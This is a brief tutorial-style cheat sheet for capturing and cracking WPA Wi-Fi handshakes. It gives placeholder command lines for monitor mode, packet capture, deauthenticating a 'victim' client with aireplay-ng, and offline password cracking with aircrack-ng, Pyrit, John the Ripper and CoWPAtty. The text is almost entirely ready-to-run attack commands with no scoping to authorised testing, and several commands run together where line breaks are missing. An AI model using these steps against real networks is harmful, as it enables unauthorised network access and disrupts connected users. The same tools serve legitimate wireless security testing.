How to Crack WPA handshake nowadays can be easy or can take an eternity, here I will explain the tools and techniques used by professionals.
Table of Contents
Capture WPA Handshake
airmon-ng start <INTERFACE> <channel>airodump-ng -c <CHANNEL> --bssid <BSSID> -w <FILENAME> wlan0monaireplay-ng -0 1 -a <BSSID> -c <MAC VICTIM> wlan0monCrack WPA Handshake Methods
Dictionary mode
Cracking WPA handshakes with a wordlist is the most common procedure
aircrack-ng -w <WORDLIST> <.CAP FILENAME>Database mode
aircrack-ng -r <DB NAME> <.CAP FILENAME>Cracking WPA with Pyrit
airmon-ng start <INTERFACE> <CHANNEL>pyrit -r <INTERFACE> -o <FILENAME> stripLiveaireplay-ng -0 1 -a <BSSID> -c <MAC VICTIM> wlan0monDictionary mode
pyrit -r <.CAP FILENAME> -i <WORDLIST> -b <BSSID> attack_passthroughDatabase mode
pyrit -i <WORDLIST> import_passwordspyrit -e <ESSID> create_essidpyrit batchpyrit -r <.CAP FILENAME> -b <BSSID> attack_dbCracking WPA with John the Ripper (JTR)
./john --wordlist=<WORDLIST> --rules --stdout | aircrack-ng -e <ESSID> -w - <.CAP FILENAME>Cracking WPA with CoWPAtty
cowpatty -r <.CAP FILENAME> -f <WORDLIST> -s <ESSID>
